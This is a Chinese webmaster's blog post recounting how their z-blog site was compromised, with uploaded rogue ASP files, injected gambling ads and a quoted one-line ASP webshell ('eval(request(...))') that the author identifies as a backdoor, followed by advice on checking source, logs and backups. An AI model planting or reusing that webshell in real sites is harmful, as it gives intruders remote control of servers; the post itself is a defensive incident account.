活动线报 | 2013年04月15日16:34:45 | 阅读:1239 | 评论:11
今天中午12点多用手机访问我的网站还是好好的,等到下午4点多来打开网站的时候,发现网站打开之后,页面错位乱码,原来是网站被黑客攻击了,于是,我立刻用FTP软件登录虚拟主机空间,并且,按照时间顺序排列文件。发现果然不对劲,有人在我虚拟主机空间上传了一个index.asp文件,然后我查看z-blog 2.1原版源码程序,发现并没有index.asp文件,所以,我断定,这个肯定是黑客上传上上去的,于是,我把这个文件立刻删除了,在访问网站的时候,果然能够正常访问了。另外,我看见还有一个文件夹名称为“inc”,其日期是今天最新的日期,我打开进入,发现里面有一个文件名称是coon.asp,但是,我查看原版的z-blog程序,发现并没有一个文件夹是inc,所以,我就果断把这个文件删除了。
下面图片是我网站被攻击之后打开的页面:
我们发现,其中有一些乱码的字符,比如“��?”,“br>”等等,之后,我又查看了网页的源代码,发现在代码的底部,挂的全部都是“博彩”和“赌场”的网站广告代码,
这个情况,应该说我不是第一次遇见了,但是,网站打开之后是乱码的情况还是第一次出现,以前我有个网站也是挂的什么淘宝商城或者是什么医疗机构,或者是什么博彩网站的广告,但是都是隐藏起来的网站链接和代码,一般我们直接打开网站之后不能直接看见这些链接,所以,我们也通常很难发现这些恶意广告链接,这些隐藏的恶意链接,很容易造成我们网站被百度,谷歌等网站降权,甚至网站被K,所以,我们需要经常查看自己的网站首页源码,最好是下载查看和分析网站日志。
另外,我通过把inc文件夹里面的的conn.asp文件下载到本地,用记事本打开之后,发现里面的代码只有一段,如下图:
我们通过在百度搜索这段代码,发现果然有很多网站有被挂上这段代码:
而且,很多挂上这个代码的,都是网站的首页标题,不得不说,网站管理员到底干哈去了?
爱小志估计代码中的“qweqwe1”应该是一个人的网络用户名,于是我们在百度搜索qweqwe1:
发现用户名称带有“qweqwe1”字符的果然不在少数,光搜索结果就达到了2万多条,这说明,用户名为qweqwe1的黑客真的是很嚣张!
还有,我们搜索“eval request”果然真相浮出了水面:
答案是“<% eval(request("#"))%>这句话是一句话小马的服务端,入侵者能利用lake2的客户端进行连接,从而得到一个网站的最高权限,更甚至,拿下这台服务器,注意站点的安全了lz”,黑客已经拿到了网站的服务器控制端。
通过这些分析,我们已经大概知道了网站服务器的问题,所以,爱小志认为,作为站长的我们,需要加强网站的安全的管理,就像这篇文章所说的《关于网赚——我想对大家说的》“黑客可以决定一个网站的生存”,所以,作为站长,尤其是个人站长的我们,需要经常对网站进行备份,备份最好是对整站进行备份,如果可以,每天都需要备份一次数据库,每周备份一次网站所有文件。备份其实很简单,只需用FTP软件登录网站虚拟主机空间,下载mdb数据库即可,其中,z-blog的数据库文件路径为:zb_users\DATA\***.mdb,其中***为您数据库的文件名称。
后记:作为个人站长其实很不容易,树大招风,何况爱小志这棵树还没有“发芽”,几乎就要被黑客扼杀在襁褓之中,究竟是爱小志得罪了各位,还是各位竞争对手网站看不惯爱小志博客呢?
另外,如果您有更好的应对措施,可以在下方给我们留言,谢谢!
温馨提示:本文是作者 loveseatao 的原创文章,转载请注明出处和附带本文链接!
上一篇:VIP网赚项目:究竟价值几何?
下一篇:站长:不要高估了网赚新手
相关文章
12资源网
www.12aj.cn